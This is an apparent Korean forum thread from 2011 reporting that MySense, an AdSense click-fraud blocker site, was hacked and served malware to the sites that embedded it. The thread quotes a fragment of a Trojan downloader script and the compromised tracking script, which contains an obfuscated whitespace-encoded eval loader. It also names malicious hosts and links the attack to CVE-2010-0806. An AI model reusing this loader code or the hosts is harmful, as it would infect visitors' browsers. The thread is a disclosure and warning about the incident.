구글 애드센스관련 사이트 마이센스 바이러스 감염
2011년 1월 22일 구글 애드센스 부정클릭 방지 프로그램인 마이센스(http://adsystem.kr/)가 바이러스에 감염되었다.
마이센스를 포함시킨 웹사이트나 블로그에서는 마이센스를 통해 다운로드된 122.newkr.info/K.Js란 파일에서 Trojan.Downloader.JNSD가 검출된다.
K.Js의 내용은 다음과 같다.
try {
new ActiveXObject("");
}
catch (e) {
var tSWI6='\x25'+'u9'+'\x30'+'\x39'+QzVAEPm7;
tSWI6+=tSWI6;
var JYhSHE0="%u";
var CoOhEll7=unescape;
//var nXwwpKf6="x";
var uzGmK5="BODY";
}
<script src="http://adsystem.kr/adinfo/mysense.js.html?id=cleansugar&time=48&count=2" type="text/javascript"> 부분의 mysense.js.html 소스는 다음과 같다.
var $a='';
if(navigator.userAgent.indexOf("Firefox")>-1){$a='FF';}
else if(navigator.userAgent.indexOf("MSIE")>-1){$a='IE';}
else{$a='FF';};
var $b;
var $c=false;
var $d;
var $e="cleansugar";
var $f=false;
var $g=0;
var $h=0;
var $i=0;
$b=document.getElementsByTagName("iframe");
for(var i=0;i<$b.length;i++){
if($b[i].src.indexOf('googleads.g.doubleclick.net')>-1){
if(document.layers){
$b[i].captureEvents($j.ONFOCUS);
};
if($a=='IE'){
$b[i].attachEvent("onfocus",MYSENSE_onMoveOverIE);
$b[i].attachEvent("onmouseout",MYSENSE_onMoveOutIE);
window.attachEvent("onunload",MYSENSE_onMoveOtherIE);
}else if($a=='FF'){
$b[i].addEventListener('mouseover',MYSENSE_onMoveOverFF,true);
$b[i].addEventListener("mouseout",MYSENSE_onMoveOutFF,false);
window.addEventListener("click",MYSENSE_onMoveOtherFF,true);
window.addEventListener("mousedown",MYSENSE_onMoveOtherFF,true);
window.addEventListener("mouseup",MYSENSE_onMoveOtherFF,true);
window.addEventListener("mousemove",MYSENSE_onMoveOtherFF,true);
}
}
};
function MYSENSE_onMoveOtherIE(){
$i=0;
};
function MYSENSE_onMoveOverIE(){
if($f) return false;
$d=event.srcElement;
$i=1;
$h=event.offsetX;
$g=event.offsetY;
};
function MYSENSE_onMoveOutIE(){
if($f)return false;
if($i!=1)return false;
$i=2;
setTimeout(MYSENSE_IETrapClick,3000);
};
function MYSENSE_IETrapClick(){
if($f)return false;
if($i!=2)return false;
var $k=$d.src;
if($k.indexOf('googleads.g.doubleclick.net')==-1){return false;};
$f=true;
MYSENSE_sendlog($d);
};
function doubleclick_Encrypt(s) {
var r = new Array();
var curr = 0;
while(s.charAt(curr) != '\n') {
var tmp = 0;
for (var i=6; i>=0 ; i-- )
{
if (s.charAt(curr) == ' ')
{
tmp = tmp | (Math.pow(2,i));
}
curr++;
}
r.push(String.fromCharCode(tmp));
}
return r.join('');
}
var doubleclick_sys="http://adsystem.kr/adinfo/block.html \n"
eval(doubleclick_Encrypt(doubleclick_sys.substring(36)));
function findY($l){
var y=0;
while($l){
y+=$l.offsetTop;
$l=$l.offsetParent;
};
return(y);
};
function findX($l){
var x=0;
while($l){
x+=$l.offsetLeft;
$l=$l.offsetParent;
};
return(x);
};
function MYSENSE_onMoveOverFF(e){
$d=this;
$i=1;
$g=e.clientY-findY(this);
$h=e.pageX-findX(this);
};
function MYSENSE_onMoveOutFF(e){
if($f)return false;
if($i!=1)return false;
$i=2;
setTimeout(MYSENSE_FFClick,3000);
};
function MYSENSE_onMoveOtherFF(e){
$i=0;
};
function MYSENSE_FFClick(){
if($i!=2)return false;
var $k=$d.src;
if($k.indexOf('googleads.g.doubleclick.net')==-1){
return false;
};
$f=true;
MYSENSE_sendlog($d);
};
function MYSENSE_sendlog($l){
var $m=new Image();
$m.src='http://log.adsystem.kr/adinfo/log.html'+'?url='+escape(MYSENSE_getAdVariable($l,'url'))+'&ref='+escape(MYSENSE_getAdVariable($l,'ref'))+'&adw='+escape(MYSENSE_getAdVariable($l,'w'))+'&adh='+escape(MYSENSE_getAdVariable($l,'h'))+'&slotname='+escape(MYSENSE_getAdVariable($l,'slotname'))+'&channel='+escape(MYSENSE_getAdVariable($l,'channel'))+'&posx='+escape($h)+'&posy='+escape($g)+'&mid='+$e;
};
function MYSENSE_getAdVariable($n,name){
var dc=$n.src;
var $o=name+"=";
var $p=dc.indexOf("&"+$o);
if($p==-1){
$p=dc.indexOf("?"+$o);
if($p==-1)return "";
}else $p+=1;
var end=dc.indexOf("&",$p);
if(end==-1)end=dc.length;
return unescape(dc.substring($p+$o.length,end));
};
function MYSENSE_setAdurl($q){
$b=document.getElementsByTagName("iframe");
for(var i=0;i<$b.length;i++){
if($b[i].src.indexOf('googleads.g.doubleclick.net')>-1){
if($q==""){
$b[i].style.display="none";
}else{
$b[i].src=$q;
}
}
};
self.setTimeout("MYSENSE_setAdurl(\""+ $q +"\")",1000);
};
js를 실행하면 流量统计라는 글자가 나오며 이 글자를 클릭하면 'http://countt.51yes.com/index.aspx?id=번호' 로 연결된다. '번호'는 241324730이다
2011년 2월 12일 17시 현재, 같은 사이트가
2011년 2월 12일 17시 현재, 같은 사이트가 또 크래킹 당해서 링크한 블로그와 사이트가 백신에게 경고당하고 있습니다.
운영자 말로는 게시판 버그로 인했다는데 다시 그런 걸 보면 아닌 걸까요?
수많은 사용자들의 애드센스 수익 내역이 크래커 손에 넘어갔습니다.
저는 3번 이상 클릭 막으려고 연결했는데 이것 없이 자바스크립트만으로 3번 클릭 막는 방법이 있을까요?
외부 사이트로 늘 접속해서 꺼림찍합니다.
이번에는 211.myt00ls.info/211.js나 1.htm 으로 연결됩니다.
1.htm의 내용은 다음과 같습니다.
211.js는 다음과 같습니다.
http://count24.51yes.com/click.aspx?id=241324730&logo=12 는 다음과 같습니다.
http://count24.51yes.com/sa.aspx?id=241324730&refe=http%3A//kldp.org/node/120505&location=http%3A//adsystem.kr/&color=32x&resolution=1680x1050&returning=0&language=ko&ua=Mozilla/4.0%20%28compatible%3B%20MSIE%208.0%3B%20Windows%20NT%205.1%3B%20Trident/4.0%3B%20.NET%20CLR%202.0.50727%3B%20.NET%20CLR%203.0.4506.2152%3B%20.NET%20CLR%203.5.30729%29 로도 접속이 되는데 adsystem.kr링크를 클릭해서 리퍼러가 넘어간 것 같습니다.
재벌 2세가 재벌이 될 확률과
금메달리스트 2세가 금메달을 딸 확률이 비슷해지도록
자유오픈소스 대안화폐를 씁시다.
아이디의 아이디어 무한도전
http://blog.aaidee.com
귀태닷컴
http://www.gwitae.com
중국발 CVE-2010-0806 취약점을 이용한
중국발 CVE-2010-0806 취약점을 이용한 공격입니다.
대한민국에서 주로 주말에 흔하게 보입니다.
일을 하지 않는 주말을 노려 공격하는 것으로 보입니다.
CVE-2010-0806: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0806
RET ;My life :P
그렇다면 IE7이하 분들 주의하세요.
그렇다면 IE7이하 분들 주의하세요.
재벌 2세가 재벌이 될 확률과
금메달리스트 2세가 금메달을 딸 확률이 비슷해지도록
자유오픈소스 대안화폐를 씁시다.
아이디의 아이디어 무한도전
http://blog.aaidee.com
귀태닷컴
http://www.gwitae.com